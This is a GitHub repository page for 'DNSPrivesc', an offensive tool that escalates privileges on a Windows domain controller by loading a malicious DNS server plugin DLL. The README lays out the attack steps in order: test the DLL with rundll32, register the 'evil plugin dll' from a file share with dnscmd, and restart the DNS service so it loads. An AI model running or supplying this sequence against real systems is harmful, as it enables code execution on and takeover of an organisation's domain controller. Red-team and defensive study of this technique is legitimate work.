Skip to content

Command execution to DC by uploading DNS service plugin DLL

Notifications You must be signed in to change notification settings

Meckazin/DNSPrivesc

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

DNSPrivesc

Shamelessly copied from: ired.team - Go read it for more detailed explanation

Using the DLL

Build and test

rundll32.exe .\DNSPrivesc.dll,DnsPluginInitialize

Upload evil plugin dll

dnscmd dc01.corp.local /config /serverlevelplugindll \\fileshare\dnsprivesc.dll

Restart DNS service to apply the evil DLL

sc stop dns
sc start dns

About

Command execution to DC by uploading DNS service plugin DLL

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published